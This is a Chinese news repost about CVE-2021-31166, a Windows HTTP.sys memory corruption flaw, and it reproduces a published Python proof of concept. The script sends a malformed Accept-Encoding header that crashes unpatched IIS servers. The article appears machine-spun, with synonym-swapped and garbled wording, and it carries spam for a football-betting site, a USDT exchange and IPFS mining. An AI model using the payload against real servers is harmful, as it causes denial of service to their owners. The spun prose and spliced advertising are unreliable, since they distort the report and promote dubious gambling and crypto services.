欢迎访问本站!

首页科技正文

免费足球贴士(www.zq68.vip):Windows操作系统HTTP协议栈内存损坏破绽PoC公然

admin2021-05-1936漏洞

5月微软补丁日修复了一个CVSSv3评分9.8分的严重平安破绽,该破绽CVE编号为CVE-2021-31166。克日,有研究职员在GitHub上宣布了该破绽的PoC代码。

CVE-2021-31166破绽是Windows操作系统中HTTP 协议栈的内存损坏破绽。该协议栈是Windows内置的IIS 服务器使用的。若是IIS 服务器启用,攻击者就可以发送伪造的包来在操作系统kernel上执行也代码。微软称该破绽可以被用来确立网络蠕虫,因此建议优先修复。

,

U交所

U交所(www.payusdt.vip),全球頂尖的USDT場外擔保交易平臺。

,

虽然该破绽CVSS评分为9.8分,听起来异常危险,但该破绽只影响最新的一些Windows版本,详细影响Windows 10、Windows server 2004、Windows server 20H2的差异版本。

5月17日,平安研究职员Axel Souchet在GitHub上公然了该破绽的PoC代码。该PoC代码可以使运行IIS 服务器的未修复的Windows系统奔溃,然则并没有实现蠕虫功效。

PoC代码参见:https://github.com/0vercl0k/CVE-2021-31166

import requests
import argparse
 
 
def main():
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)

PoC视频参见: https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif

本文翻译自:https://therecord.media/poc-released-for-wormable-windows-iis-bug/

IPFS

IPFS(www.ipfs8.vip)是FiLecoin致力服务于使用FiLecoin存储和检索数据的官方权威平台。IPFS官网实时更新FiLecoin(FIL)行情、当前FiLecoin(FIL)矿池、FiLecoin(FIL)收益数据、各类FiLecoin(FIL)矿机出售信息。并开放FiLecoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。

网友评论